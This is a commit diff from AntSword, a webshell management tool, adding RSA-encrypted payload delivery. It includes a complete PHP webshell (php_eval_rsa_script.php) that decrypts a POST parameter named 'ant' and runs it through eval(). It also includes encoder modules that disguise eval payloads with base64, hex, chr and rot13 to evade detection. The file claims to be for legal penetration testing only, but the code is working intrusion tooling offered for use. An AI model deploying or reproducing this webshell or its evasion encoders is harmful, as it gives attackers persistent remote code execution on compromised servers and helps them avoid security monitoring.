Skip to content

A
antSword
Unverified Commit 4985a39c authored by Virink's avatar Virink
Browse files
Options

更新 编码器Encoder,添加扩展参数,添加 RSA 模式,添加 PHP-RSA 示例

parent 7c6b04da
Hide whitespace changes
Inline Side-by-side
Showing with 452 additions and 201 deletions
shells/php_eval_rsa_script.php 0 → 100644
View file @ 4985a39c
<?php
/**
* _ ____ _
* __ _ _ __ | |_/ ___|_ _____ _ __ __| |
* / _` | '_ \| __\___ \ \ /\ / / _ \| '__/ _` |
* | (_| | | | | |_ ___) \ V V / (_) | | | (_| |
* \__,_|_| |_|\__|____/ \_/\_/ \___/|_| \__,_|
* ———————————————————————————————————————————————
* AntSword PHP eval RSA Script
*
* 警告:
* 此脚本仅供合法的渗透测试以及爱好者参考学习
* 请勿用于非法用途,否则将追究其相关责任!
* ———————————————————————————————————————————————
* pwd=ant
*/
$cmd = @$_POST['ant'];
$publicKey = <<<EOF
-----BEGIN PUBLIC KEY-----
Input your Public Key
-----END PUBLIC KEY-----
EOF;
$cmds = explode("|", $cmd);
$publicKey = openssl_pkey_get_public($publicKey);
$cmd = '';
foreach ($cmds as $value) {
if (openssl_public_decrypt(base64_decode($value), $de, $publicKey)) {
$cmd .= $de;
}
}
eval($cmd);
?>
\ No newline at end of file
source/core/asp/encoder/xxxxdog.js
View file @ 4985a39c
......@@ -7,7 +7,7 @@
// 密码:ant
'use strict';
module.exports = (pwd, data) => {
module.exports = (pwd, data, ext = null) => {
data[pwd] = data['_'].replace(/eval/ig, 'xxxx');
delete data['_'];
return data;
......
source/core/aspx/encoder/base64.js
View file @ 4985a39c
......@@ -6,7 +6,7 @@
'use strict';
module.exports = (pwd, data) => {
module.exports = (pwd, data, ext = null) => {
let randomID = `_0x${Math.random().toString(16).substr(2)}`;
data[randomID] = Buffer.from(data['_']).toString('base64');
data[pwd] = `eval(System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String(Request.Item["${randomID}"])),"unsafe");`;
......
source/core/aspx/encoder/hex.js
View file @ 4985a39c
......@@ -6,8 +6,7 @@
'use strict';
module.exports = (pwd, data) => {
module.exports = (pwd, data, ext = null) => {
let randomID = `_0x${Math.random().toString(16).substr(2)}`;
let hexencoder = "function HexAsciiConvert(hex:String) {var sb:System.Text.StringBuilder = new System.Text.StringBuilder();var i;for(i=0; i< hex.Length; i+=2){sb.Append(System.Convert.ToString(System.Convert.ToChar(Int32.Parse(hex.Substring(i,2), System.Globalization.NumberStyles.HexNumber))));}return sb.ToString();};";
data[randomID] = Buffer.from(data['_']).toString('hex');
......
source/core/base.js
View file @ 4985a39c
......@@ -7,6 +7,8 @@
'use strict';
const iconv = require('iconv-lite');
const NodeRSA = require('node-rsa');
const fs = require('fs');
class Base {
......@@ -52,11 +54,22 @@ class Base {
}
}
// 解析自定义编码器
this.user_encoders.map((_)=>{
this.user_encoders.map((_) => {
this.parseEncoder(`${_}`);
});
}
/**
* 返回 RSA 对象
* @return {Object}
*/
rsaEncrypt() {
let key = new NodeRSA();
let priKey = fs.readFileSync(path.join(remote.process.env.AS_WORKDIR, `antData/key_rsa`));
key.importKey(priKey.toString(), 'private');
return key;
}
/**
* 返回参数列表
* @return {array} [arg1, arg2, arg3..]
......@@ -131,7 +144,7 @@ class Base {
for (let funcName in templateObj) {
this[templateName][funcName] = (
(args) => {
if (typeof(args) === 'object') {
if (typeof (args) === 'object') {
// 如果脚本函数需要参数,则进行解析
return (argv) => {
let data = {};
......@@ -152,7 +165,7 @@ class Base {
(func = formatter[tagArr[0]])
) {
// 如果包含有分割标签且该格式化函数存在,则调用该函数进行处理
retStr = func( argv[tagArr[1] || ''] );
retStr = func(argv[tagArr[1] || '']);
} else {
// 否则替换直接返回字符串
retStr = argv[tagStr] || '';
......@@ -185,7 +198,7 @@ class Base {
// https://github.com/AntSwordProject/antSword/issues/135#issuecomment-475842870
delete require.cache[require.resolve(`${enc}`)];
// QAQ!我也不知道为什么,如果直接require变量名,babel编译就会warning,so我只好加个`咯~
this['__encoder__'][enc.indexOf(`encoder/`) > -1 ? enc.split(`encoder/`)[1]:enc.split(`encoder\\`)[1]] = require(`${enc}`);
this['__encoder__'][enc.indexOf(`encoder/`) > -1 ? enc.split(`encoder/`)[1] : enc.split(`encoder\\`)[1]] = require(`${enc}`);
}
/**
......@@ -196,10 +209,14 @@ class Base {
* @return {Object} 最终生成数据// 将返回三个参数对象:tag_s,tag_e,data
*/
encodeComplete(tag_s, tag_e, data) {
let ext = {
rsa: this.rsaEncrypt()
}
// 编码器处理
let finalData = this.__encoder__[this.__opts__['encoder']](
this.__opts__['pwd'],
data
data,
ext
);
return {
'tag_s': tag_s,
......@@ -225,7 +242,7 @@ class Base {
// 请求完毕返回数据{text,buff}
.once(`request-${hash}`, (event, ret) => {
return res({
'encoding': ret['encoding']||"",
'encoding': ret['encoding'] || "",
'text': ret['text'],
'buff': ret['buff']
});
......
source/core/custom/encoder/base64.js
View file @ 4985a39c
......@@ -6,7 +6,7 @@
'use strict';
module.exports = (pwd, data) => {
module.exports = (pwd, data, ext = null) => {
let ret = {};
for (let _ in data) {
if (_ === '_') { continue };
......
source/core/custom/encoder/hex.js
View file @ 4985a39c
......@@ -4,7 +4,7 @@
'use strict';
module.exports = (pwd, data) => {
module.exports = (pwd, data, ext = null) => {
let ret = {};
for (let _ in data) {
if (_ === '_') { continue };
......
source/core/php/encoder/base64.js
View file @ 4985a39c
......@@ -5,7 +5,7 @@
'use strict';
module.exports = (pwd, data) => {
module.exports = (pwd, data, ext = null) => {
// 生成一个随机变量名
let randomID = `_0x${Math.random().toString(16).substr(2)}`;
data[randomID] = Buffer.from(data['_']).toString('base64');
......
source/core/php/encoder/chr.js
View file @ 4985a39c
......@@ -5,14 +5,14 @@
'use strict'
module.exports = (pwd, data) => {
module.exports = (pwd, data, ext = null) => {
// 编码函数
const encode = (php) => {
let ret = [];
let i = 0;
while(i < php.length) {
while (i < php.length) {
ret.push(php[i].charCodeAt());
i ++;
i++;
}
return `@eVAl(cHr(${ret.join(').ChR(')}));`;
}
......
source/core/php/encoder/chr16.js
View file @ 4985a39c
......@@ -5,14 +5,14 @@
'use strict'
module.exports = (pwd, data) => {
module.exports = (pwd, data, ext = null) => {
// 编码函数
const encode = (php) => {
let ret = [];
let i = 0;
while(i < php.length) {
while (i < php.length) {
ret.push(php[i].charCodeAt().toString(16));
i ++;
i++;
}
return `@eVAl(cHr(0x${ret.join(').ChR(0x')}));`;
}
......
source/core/php/encoder/rot13.js
View file @ 4985a39c
......@@ -6,15 +6,15 @@
'use strict';
module.exports = (pwd, data) => {
module.exports = (pwd, data, ext = null) => {
const encode = (s) => {
//use a Regular Expression to Replace only the characters that are a-z or A-Z
return s.replace(/[a-zA-Z]/g, function (c) {
//Get the character code of the current character and add 13 to it
//If it is larger than z's character code then subtract 26 to support wrap around.
return String.fromCharCode((c <= "Z" ? 90 : 122) >= (c = c.charCodeAt(0) + 13) ? c : c - 26);
//Get the character code of the current character and add 13 to it
//If it is larger than z's character code then subtract 26 to support wrap around.
return String.fromCharCode((c <= "Z" ? 90 : 122) >= (c = c.charCodeAt(0) + 13) ? c : c - 26);
});
}
}
// 生成一个随机变量名
let randomID = `_0x${Math.random().toString(16).substr(2)}`;
......
source/language/en.js
View file @ 4985a39c
......@@ -235,7 +235,7 @@ Hot Keys:
title: 'FileManager',
delete: {
title: 'Delete',
confirm: (num) => antSword.noxss(`Are you sure to delete ${typeof(num) === 'number' ? num + ' files' : num} ?`),
confirm: (num) => antSword.noxss(`Are you sure to delete ${typeof (num) === 'number' ? num + ' files' : num} ?`),
success: (path) => `Delete file [${path}] success!`,
error: (path, err) => `Delete file [${path}] failed!${err ? '\n' + err : ''}`
},
......@@ -522,7 +522,7 @@ Hot Keys:
gridheader: "Name,Type,Length,Not Null,Key,Auto Increment",
delete_not_select: "Please select the row you want to delete first",
save_row_is_null: "The number of rows is empty",
cell_valid_error: (i,j)=>`Data format validation failed(row ${i+1}, col ${j+1})`,
cell_valid_error: (i, j) => `Data format validation failed(row ${i + 1}, col ${j + 1})`,
confirmtitle: "New table name",
invalid_tablename: "Table names should not contain special symbols",
success: 'Create table successfully',
......@@ -535,7 +535,7 @@ Hot Keys:
error: 'Failed to update table',
},
deltable: {
title:'Delete Table',
title: 'Delete Table',
confirm: (name) => antSword.noxss(`Are you sure you want to delete table ${name}?`),
success: 'Delete table successfully',
error: 'Failed to delete table',
......@@ -551,7 +551,7 @@ Hot Keys:
error: 'Failed to update column',
},
delcolumn: {
title:'Delete Column',
title: 'Delete Column',
confirm: (name) => antSword.noxss(`Are you sure you want to delete column ${name}?`),
success: 'Delete column successfully',
error: 'Failed to delete column',
......@@ -615,10 +615,10 @@ Hot Keys:
}
},
message: {
githint: (workdir)=>`The current source is Git management, please close the program and go to ${workdir} to manually update`,
githint: (workdir) => `The current source is Git management, please close the program and go to ${workdir} to manually update`,
prepare: "Connecte to server...",
dling: (progress)=> `Downloading...${progress}%`,
dlingnp: (size)=> `Downloading...${size}`,
dling: (progress) => `Downloading...${progress}%`,
dlingnp: (size) => `Downloading...${size}`,
dlend: "Download completed",
extract: "Unpacking, don't close AntSword",
ing: 'Downloading..',
......@@ -626,7 +626,7 @@ Hot Keys:
success: 'Update success! Please manually restart the application later!'
}
},
encoders:{
encoders: {
title: 'Encoder Manager',
toolbar: {
new: "New",
......@@ -634,11 +634,19 @@ Hot Keys:
delete: "Delete",
help: "Help",
save: "Save",
rsa: "RSA Config",
generate: "Generate"
},
grid: {
ename: "Name",
etype: "Type"
},
form: {
public_key: "Public Key",
private_key: "Private Key",
php_code: "PHP Code"
},
rsa_config_win_title: "RSA Encoder Config",
edit_win_title: "Edit Encoder",
delete_title: "Delete Encoder",
message: {
......@@ -654,12 +662,15 @@ Hot Keys:
delete_not_select: "Please select the row you want to delete first",
delete_success: "Delete success",
ename_invalid: "Name can only contain numbers, letters, and underlines",
rsa_save_success: "Generate and save RSA success",
rsa_save_error: "Generate and save RSA error",
},
prompt: {
create_encoder: "Create Encoder",
},
confirm: {
delete: (num) => antSword.noxss(`Are you sure to delete ${typeof(num) === 'number' ? num + ' encoders' : num}?`),
generate: 'Are you sure to regemerate RSA?',
delete: (num) => antSword.noxss(`Are you sure to delete ${typeof (num) === 'number' ? num + ' encoders' : num}?`),
}
},
aproxy: {
......@@ -670,7 +681,7 @@ Hot Keys:
},
form: {
label: 'Configure proxy for access to the Internet',
mode:{
mode: {
noproxy: 'Do not use agent',
manualproxy: 'Manually set the proxy'
},
......@@ -689,7 +700,7 @@ Hot Keys:
content: 'Restart the application to take effect, whether to restart?',
title: 'Change proxy settings'
},
prompt:{
prompt: {
title: 'Enter the Test-URL',
success: 'Connect to proxy server successfully',
error: 'Failed to connect to the proxy server'
......@@ -706,7 +717,7 @@ Hot Keys:
toolbar: {
save: 'Save'
},
form:{
form: {
shellmanager: {
title: 'Shell Lists',
hiddencolumns: {
......@@ -759,7 +770,7 @@ Hot Keys:
},
del: {
title: 'Delete Bookmark',
confirm: (num) => antSword.noxss(`Are you sure to delete ${typeof(num) === 'number' ? num + ' Bookmarks' : num+" "}?`),
confirm: (num) => antSword.noxss(`Are you sure to delete ${typeof (num) === 'number' ? num + ' Bookmarks' : num + " "}?`),
success: 'Delete success'
},
edit: {
......@@ -781,7 +792,7 @@ Hot Keys:
},
viewsite: {
toolbar: {
useproxy: (s) => `Proxy: ${s?'ON':'OFF'}`,
useproxy: (s) => `Proxy: ${s ? 'ON' : 'OFF'}`,
save: 'Save',
view: 'View'
},
......
source/language/zh.js
View file @ 4985a39c
......@@ -236,7 +236,7 @@ module.exports = {
title: '文件管理',
delete: {
title: '删除文件',
confirm: (num) => antSword.noxss(`你确定要删除 ${typeof(num) === 'number' ? num + ' 个文件' : num} 吗?`),
confirm: (num) => antSword.noxss(`你确定要删除 ${typeof (num) === 'number' ? num + ' 个文件' : num} 吗?`),
success: (path) => `删除文件成功!\n${path}`,
error: (path, err) => `删除文件 [${path}] 失败!${err ? '\n' + err : ''}`
},
......@@ -523,7 +523,7 @@ module.exports = {
gridheader: "名称,类型,长度,不为空,主键,自增长",
delete_not_select: "请先选中要删除的行",
save_row_is_null: "行数为空",
cell_valid_error: (i,j)=>`数据格式校验失败(${i+1}行,${j+1}列)`,
cell_valid_error: (i, j) => `数据格式校验失败(${i + 1}行,${j + 1}列)`,
confirmtitle: "输入新表名",
invalid_tablename: "表名不能带有特殊符号",
success: '新建表成功',
......@@ -536,7 +536,7 @@ module.exports = {
error: '修改表名失败',
},
deltable: {
title:'删除表',
title: '删除表',
confirm: (name) => antSword.noxss(`确定要删除表 ${name} 吗?`),
success: '删除表成功',
error: '删除表失败',
......@@ -552,7 +552,7 @@ module.exports = {
error: '修改列名失败'
},
delcolumn: {
title:'删除列',
title: '删除列',
confirm: (name) => antSword.noxss(`确定要删除列 ${name} 吗?`),
success: '删除列成功',
error: '删除列失败',
......@@ -616,10 +616,10 @@ module.exports = {
}
},
message: {
githint: (workdir)=>`当前源码为Git管理,请关闭程序并前往 ${workdir} 手动更新`,
githint: (workdir) => `当前源码为Git管理,请关闭程序并前往 ${workdir} 手动更新`,
prepare: "连接更新服务器...",
dling: (progress)=> `正在下载更新包...${progress}%`,
dlingnp: (size)=> `正在下载更新包...${size}`,
dling: (progress) => `正在下载更新包...${progress}%`,
dlingnp: (size) => `正在下载更新包...${size}`,
dlend: "下载完毕",
extract: "正在解压, 请勿关闭程序",
ing: '努力更新中。。',
......@@ -627,7 +627,7 @@ module.exports = {
success: '更新成功!请稍后手动重启应用!'
}
},
encoders:{
encoders: {
title: '编码管理',
toolbar: {
new: "新建",
......@@ -635,11 +635,19 @@ module.exports = {
delete: "删除",
help: "帮助",
save: "保存",
rsa: "RSA配置",
generate: "生成"
},
grid: {
ename: "名称",
etype: "类型"
},
form: {
public_key: "公钥",
private_key: "私钥",
php_code: "PHP 代码"
},
rsa_config_win_title: "RSA编码器配置",
edit_win_title: "编辑编码器",
delete_title: "删除编码器",
message: {
......@@ -655,12 +663,15 @@ module.exports = {
delete_not_select: "请先选中要删除的行",
delete_success: "删除成功",
ename_invalid: "名称只能包含数字、字母、下划线",
rsa_save_success: "生成 RSA 密钥对成功",
rsa_save_error: "生成 RSA 密钥对错误",
},
prompt: {
create_encoder: "创建编码器",
},
confirm: {
delete: (num) => antSword.noxss(`你确定要删除 ${typeof(num) === 'number' ? num + ' 个编码器' : num+" "}吗?`),
generate: '你确定要重新生成?',
delete: (num) => antSword.noxss(`你确定要删除 ${typeof (num) === 'number' ? num + ' 个编码器' : num + " "}吗?`),
}
},
aproxy: {
......@@ -671,7 +682,7 @@ module.exports = {
},
form: {
label: '配置访问互联网的代理',
mode:{
mode: {
noproxy: '不使用代理',
manualproxy: '手动设置代理'
},
......@@ -690,7 +701,7 @@ module.exports = {
content: '重启应用生效,是否重启?',
title: '更改代理设置'
},
prompt:{
prompt: {
title: '输入测试的 URL',
success: '连接到代理服务器成功',
error: '连接到代理服务器失败'
......@@ -707,7 +718,7 @@ module.exports = {
toolbar: {
save: '保存'
},
form:{
form: {
shellmanager: {
title: '数据管理',
hiddencolumns: {
......@@ -760,7 +771,7 @@ module.exports = {
},
del: {
title: '删除书签',
confirm: (num) => antSword.noxss(`你确定要删除 ${typeof(num) === 'number' ? num + ' 个书签' : num+" "}吗?`),
confirm: (num) => antSword.noxss(`你确定要删除 ${typeof (num) === 'number' ? num + ' 个书签' : num + " "}吗?`),
success: '删除成功'
},
edit: {
......@@ -781,7 +792,7 @@ module.exports = {
},
viewsite: {
toolbar: {
useproxy: (s) => `代理: ${s?'开':'关'}`,
useproxy: (s) => `代理: ${s ? '开' : '关'}`,
save: '保存',
view: '浏览'
},
......
source/language/zh_hk.js
View file @ 4985a39c
......@@ -236,7 +236,7 @@ module.exports = {
title: '文件管理',
delete: {
title: '刪除文件',
confirm: (num) => antSword.noxss(`你確定要刪除 ${typeof(num) === 'number' ? num + ' 個文件' : num} 嗎?`),
confirm: (num) => antSword.noxss(`你確定要刪除 ${typeof (num) === 'number' ? num + ' 個文件' : num} 嗎?`),
success: (path) => `刪除文件成功!\n${path}`,
error: (path, err) => `刪除文件 [${path}] 失敗!${err ? '\n' + err : ''}`
},
......@@ -523,7 +523,7 @@ module.exports = {
gridheader: "名稱,類型,長度,不為空,主鍵,自增長",
delete_not_select: "請先選中要刪除的行",
save_row_is_null: "行數為空",
cell_valid_error: (i,j)=>`數據格式校驗失敗(${i+1}行,${j+1}列)`,
cell_valid_error: (i, j) => `數據格式校驗失敗(${i + 1}行,${j + 1}列)`,
confirmtitle: "輸入新表名",
invalid_tablename: "表名不能帶有特殊符號",
success: '新建表成功',
......@@ -536,7 +536,7 @@ module.exports = {
error: '修改表名失敗',
},
deltable: {
title:'刪除表',
title: '刪除表',
confirm: (name) => antSword.noxss(`確定要刪除表 ${name} 嗎?`),
success: '刪除表成功',
error: '刪除表失敗',
......@@ -552,7 +552,7 @@ module.exports = {
error: '修改列名失敗'
},
delcolumn: {
title:'刪除列',
title: '刪除列',
confirm: (name) => antSword.noxss(`確定要刪除列 ${name} 嗎?`),
success: '刪除列成功',
error: '刪除列失敗',
......@@ -616,10 +616,10 @@ module.exports = {
}
},
message: {
githint: (workdir)=>`當前源碼為Git管理,請關閉程序並前往 ${workdir} 手動更新`,
githint: (workdir) => `當前源碼為Git管理,請關閉程序並前往 ${workdir} 手動更新`,
prepare: "連接更新服務器...",
dling: (progress)=> `正在下載更新包...${progress}%`,
dlingnp: (size)=> `正在下載更新包...${size}`,
dling: (progress) => `正在下載更新包...${progress}%`,
dlingnp: (size) => `正在下載更新包...${size}`,
dlend: "下載完畢",
extract: "正在解壓, 請勿關閉程序",
ing: '努力更新中。。',
......@@ -627,7 +627,7 @@ module.exports = {
success: '更新成功!請稍後手動重啟應用!'
}
},
encoders:{
encoders: {
title: '編碼管理',
toolbar: {
new: "新建",
......@@ -635,11 +635,19 @@ module.exports = {
delete: "刪除",
help: "幫助",
save: "保存",
rsa: "RSA配置",
generate: "生成"
},
grid: {
ename: "名稱",
etype: "類型"
},
form: {
public_key: "公鑰",
private_key: "私鑰",
php_code: "PHP 代碼"
},
rsa_config_win_title: "RSA編碼器配置",
edit_win_title: "編輯編碼器",
delete_title: "刪除編碼器",
message: {
......@@ -655,12 +663,15 @@ module.exports = {
delete_not_select: "請先選中要刪除的行",
delete_success: "刪除成功",
ename_invalid: "名稱只能包含數字、字母、下劃線",
rsa_save_success: "生成 RSA 密鑰對成功",
rsa_save_error: "生成 RSA 密鑰對錯誤",
},
prompt: {
generate: '妳確定要重新生成?',
create_encoder: "創建編碼器",
},
confirm: {
delete: (num) => antSword.noxss(`你確定要刪除 ${typeof(num) === 'number' ? num + ' 個編碼器' : num+" "}嗎?`),
delete: (num) => antSword.noxss(`你確定要刪除 ${typeof (num) === 'number' ? num + ' 個編碼器' : num + " "}嗎?`),
}
},
aproxy: {
......@@ -671,7 +682,7 @@ module.exports = {
},
form: {
label: '配置訪問互聯網的代理',
mode:{
mode: {
noproxy: '不使用代理',
manualproxy: '手動設置代理'
},
......@@ -690,7 +701,7 @@ module.exports = {
content: '重啟應用生效,是否重啟?',
title: '更改代理設置'
},
prompt:{
prompt: {
title: '輸入測試的 URL',
success: '連接到代理服務器成功',
error: '連接到代理服務器失敗'
......@@ -707,7 +718,7 @@ module.exports = {
toolbar: {
save: '保存'
},
form:{
form: {
shellmanager: {
title: '數據管理',
hiddencolumns: {
......@@ -760,7 +771,7 @@ module.exports = {
},
del: {
title: '刪除書籤',
confirm: (num) => antSword.noxss(`你確定要刪除 ${typeof(num) === 'number' ? num + ' 個書籤' : num+" "}嗎?`),
confirm: (num) => antSword.noxss(`你確定要刪除 ${typeof (num) === 'number' ? num + ' 個書籤' : num + " "}嗎?`),
success: '刪除成功'
},
edit: {
......@@ -781,7 +792,7 @@ module.exports = {
},
viewsite: {
toolbar: {
useproxy: (s) => `代理: ${s?'開':'關'}`,
useproxy: (s) => `代理: ${s ? '開' : '關'}`,
save: '保存',
view: '瀏覽'
},
......
source/language/zh_tw.js
View file @ 4985a39c
......@@ -236,7 +236,7 @@ module.exports = {
title: '文件管理',
delete: {
title: '刪除文件',
confirm: (num) => antSword.noxss(`你確定要刪除 ${typeof(num) === 'number' ? num + ' 個文件' : num} 嗎?`),
confirm: (num) => antSword.noxss(`你確定要刪除 ${typeof (num) === 'number' ? num + ' 個文件' : num} 嗎?`),
success: (path) => `刪除文件成功!\n${path}`,
error: (path, err) => `刪除文件 [${path}] 失敗!${err ? '\n' + err : ''}`
},
......@@ -523,7 +523,7 @@ module.exports = {
gridheader: "名稱,類型,長度,不為空,主鍵,自增長",
delete_not_select: "請先選中要刪除的行",
save_row_is_null: "行數為空",
cell_valid_error: (i,j)=>`數據格式校驗失敗(${i+1}行,${j+1}列)`,
cell_valid_error: (i, j) => `數據格式校驗失敗(${i + 1}行,${j + 1}列)`,
confirmtitle: "輸入新表名",
invalid_tablename: "表名不能帶有特殊符號",
success: '新建表成功',
......@@ -536,7 +536,7 @@ module.exports = {
error: '修改表名失敗',
},
deltable: {
title:'刪除表',
title: '刪除表',
confirm: (name) => antSword.noxss(`確定要刪除表 ${name} 嗎?`),
success: '刪除表成功',
error: '刪除表失敗',
......@@ -552,7 +552,7 @@ module.exports = {
error: '修改列名失敗'
},
delcolumn: {
title:'刪除列',
title: '刪除列',
confirm: (name) => antSword.noxss(`確定要刪除列 ${name} 嗎?`),
success: '刪除列成功',
error: '刪除列失敗',
......@@ -616,10 +616,10 @@ module.exports = {
}
},
message: {
githint: (workdir)=>`當前源碼為Git管理,請關閉程序並前往 ${workdir} 手動更新`,
githint: (workdir) => `當前源碼為Git管理,請關閉程序並前往 ${workdir} 手動更新`,
prepare: "連接更新服務器...",
dling: (progress)=> `正在下載更新包...${progress}%`,
dlingnp: (size)=> `正在下載更新包...${size}`,
dling: (progress) => `正在下載更新包...${progress}%`,
dlingnp: (size) => `正在下載更新包...${size}`,
dlend: "下載完畢",
extract: "正在解壓, 請勿關閉程序",
ing: '努力更新中。。',
......@@ -627,7 +627,7 @@ module.exports = {
success: '更新成功!請稍後手動重啟應用!'
}
},
encoders:{
encoders: {
title: '編碼管理',
toolbar: {
new: "新建",
......@@ -635,11 +635,19 @@ module.exports = {
delete: "刪除",
help: "幫助",
save: "保存",
rsa: "RSA配置",
generate: "生成"
},
grid: {
ename: "名稱",
etype: "類型"
},
form: {
public_key: "公鑰",
private_key: "私鑰",
php_code: "PHP 代碼"
},
rsa_config_win_title: "RSA編碼器配置",
edit_win_title: "編輯編碼器",
delete_title: "刪除編碼器",
message: {
......@@ -655,12 +663,15 @@ module.exports = {
delete_not_select: "請先選中要刪除的行",
delete_success: "刪除成功",
ename_invalid: "名稱只能包含數字、字母、下劃線",
rsa_save_success: "生成 RSA 密鑰對成功",
rsa_save_error: "生成 RSA 密鑰對錯誤",
},
prompt: {
create_encoder: "創建編碼器",
},
confirm: {
delete: (num) => antSword.noxss(`你確定要刪除 ${typeof(num) === 'number' ? num + ' 個編碼器' : num+" "}嗎?`),
generate: '妳確定要重新生成?',
delete: (num) => antSword.noxss(`你確定要刪除 ${typeof (num) === 'number' ? num + ' 個編碼器' : num + " "}嗎?`),
}
},
aproxy: {
......@@ -671,7 +682,7 @@ module.exports = {
},
form: {
label: '配置訪問互聯網的代理',
mode:{
mode: {
noproxy: '不使用代理',
manualproxy: '手動設置代理'
},
......@@ -690,7 +701,7 @@ module.exports = {
content: '重啟應用生效,是否重啟?',
title: '更改代理設置'
},
prompt:{
prompt: {
title: '輸入測試的 URL',
success: '連接到代理服務器成功',
error: '連接到代理服務器失敗'
......@@ -707,7 +718,7 @@ module.exports = {
toolbar: {
save: '保存'
},
form:{
form: {
shellmanager: {
title: '數據管理',
hiddencolumns: {
......@@ -760,7 +771,7 @@ module.exports = {
},
del: {
title: '刪除書籤',
confirm: (num) => antSword.noxss(`你確定要刪除 ${typeof(num) === 'number' ? num + ' 個書籤' : num+" "}嗎?`),
confirm: (num) => antSword.noxss(`你確定要刪除 ${typeof (num) === 'number' ? num + ' 個書籤' : num + " "}嗎?`),
success: '刪除成功'
},
edit: {
......@@ -781,7 +792,7 @@ module.exports = {
},
viewsite: {
toolbar: {
useproxy: (s) => `代理: ${s?'開':'關'}`,
useproxy: (s) => `代理: ${s ? '開' : '關'}`,
save: '保存',
view: '瀏覽'
},
......
source/modules/settings/encoders.js
View file @ 4985a39c
......@@ -10,6 +10,7 @@ const LANG = antSword['language']['settings']['encoders'];
const LANG_T = antSword['language']['toastr'];
const fs = require('fs');
const path = require('path');
const NodeRSA = require('node-rsa');
const WIN = require("../../ui/window");
class Encoders {
......@@ -18,6 +19,14 @@ class Encoders {
var that = this;
this.encoders = antSword["encoders"];
let keyPath = path.join(remote.process.env.AS_WORKDIR, `antData/`);
this.rsa = {
keyPath: {
pub: `${keyPath}/key_rsa.pub`,
pri: `${keyPath}/key_rsa`
}
}
sidebar.addItem({
id: 'encoders',
text: `<i class="fa fa-file-code-o"></i> ${LANG['title']}`
......@@ -27,39 +36,49 @@ class Encoders {
const toolbar = that.cell.attachToolbar();
toolbar.loadStruct([
{ type: 'buttonSelect', text: LANG['toolbar']['new'], icon: 'plus-circle', id: 'new', openAll: true,
options: [
{ id: 'new_asp', icon: 'file-code-o', type: 'button', text: "ASP" },
{ id: 'new_aspx', icon: 'file-code-o', type: 'button', text: "ASPX"},
{ id: 'new_php', icon: 'file-code-o', type: 'button', text: "PHP"},
{ type: 'separator' },
{ id: 'new_custom', icon: 'file-code-o', type: 'button', text: "Custom"}
]},
{
type: 'buttonSelect', text: LANG['toolbar']['new'], icon: 'plus-circle', id: 'new', openAll: true,
options: [
{ id: 'new_asp', icon: 'file-code-o', type: 'button', text: "ASP" },
{ id: 'new_aspx', icon: 'file-code-o', type: 'button', text: "ASPX" },
{ id: 'new_php', icon: 'file-code-o', type: 'button', text: "PHP" },
{ type: 'separator' },
{ id: 'new_custom', icon: 'file-code-o', type: 'button', text: "Custom" },
{ type: 'separator' },
{ id: 'new_php_rsa', icon: 'file-code-o', type: 'button', text: "PHP RSA" }
]
},
{ type: 'separator' },
{ type: 'button', text: LANG['toolbar']['edit'], icon: 'fa fa-edit', id: 'edit' },
{ type: 'button', text: LANG['toolbar']['delete'], icon: 'fa fa-trash-o', id: 'delete' },
{ type: 'separator' },
{ type: 'button', text: LANG['toolbar']['rsa'], icon: 'fa fa-key', id: 'rsa' }
]);
toolbar.attachEvent("onClick", (id)=>{
switch(id) {
toolbar.attachEvent("onClick", (id) => {
switch (id) {
case "new_asp":
that.createEncoder("asp");
break;
that.createEncoder(id);
break;
case "new_aspx":
that.createEncoder("aspx");
break;
that.createEncoder(id);
break;
case "new_php":
that.createEncoder("php");
break;
case "new_php_rsa":
that.createEncoder(id);
break;
case "new_custom":
that.createEncoder("custom");
break;
that.createEncoder(id);
break;
case "edit":
that.editEncoder();
break;
that.editEncoder();
break;
case "delete":
that.deleteEncoder();
break;
that.deleteEncoder();
break;
case "rsa":
that.rsaConfig();
break;
}
});
......@@ -75,87 +94,90 @@ class Encoders {
grid.setColAlign("center,left,center");
grid.enableMultiselect(true);
var combobox = grid.getCombo(2);
combobox.put("asp","ASP");
combobox.put("aspx","ASPX");
combobox.put("php","PHP");
combobox.put("custom","CUSTOM");
grid.attachEvent("onEditCell", function(stage,rId,cInd,nValue,oValue){
combobox.put("asp", "ASP");
combobox.put("aspx", "ASPX");
combobox.put("php", "PHP");
combobox.put("custom", "CUSTOM");
grid.attachEvent("onEditCell", function (stage, rId, cInd, nValue, oValue) {
// 2 编辑完成
if(stage === 2) {
if (stage === 2) {
nValue = nValue.toLocaleLowerCase();
oValue = oValue.toLocaleLowerCase();
if(nValue === oValue){return;}
if (nValue === oValue) { return; }
var oename = grid.getRowAttribute(rId, "ename");
var oepath = grid.getRowAttribute(rId, "epath");
var oetype = grid.getRowAttribute(rId, "etype");
oepath = oepath+".js";
switch(cInd){
oepath = oepath + ".js";
switch (cInd) {
case 1:
// name
if(!nValue.match(/^[a-zA-Z0-9_]+$/)){
toastr.error(LANG["message"]["ename_invalid"],LANG_T['error']);
return
}
if(that._checkname(nValue, oetype)){
toastr.error(LANG['message']['ename_duplicate'], LANG_T['error']);
return;
}
fs.renameSync(oepath, path.join(remote.process.env.AS_WORKDIR, `antData/encoders/${oetype}/encoder/${nValue}.js`));
toastr.success(LANG['message']["rename_success"],LANG_T["success"]);
break
// name
if (!nValue.match(/^[a-zA-Z0-9_]+$/)) {
toastr.error(LANG["message"]["ename_invalid"], LANG_T['error']);
return
}
if (that._checkname(nValue, oetype)) {
toastr.error(LANG['message']['ename_duplicate'], LANG_T['error']);
return;
}
fs.renameSync(oepath, path.join(remote.process.env.AS_WORKDIR, `antData/encoders/${oetype}/encoder/${nValue}.js`));
toastr.success(LANG['message']["rename_success"], LANG_T["success"]);
break
case 2:
// type
if(nValue != "asp" && nValue != "aspx" && nValue != "php" && nValue != "custom") {
toastr.error(LANG['message']["etype_error"], LANG_T['error']);
return
}
if(that._checkname(oename, nValue)){
toastr.error(LANG['message']['ename_duplicate'], LANG_T['error']);
return;
}
fs.renameSync(oepath, path.join(remote.process.env.AS_WORKDIR, `antData/encoders/${nValue}/encoder/${oename}.js`));
toastr.success(LANG['message']["retype_success"],LANG_T["success"]);
break
// type
if (nValue != "asp" && nValue != "aspx" && nValue != "php" && nValue != "custom") {
toastr.error(LANG['message']["etype_error"], LANG_T['error']);
return
}
if (that._checkname(oename, nValue)) {
toastr.error(LANG['message']['ename_duplicate'], LANG_T['error']);
return;
}
fs.renameSync(oepath, path.join(remote.process.env.AS_WORKDIR, `antData/encoders/${nValue}/encoder/${oename}.js`));
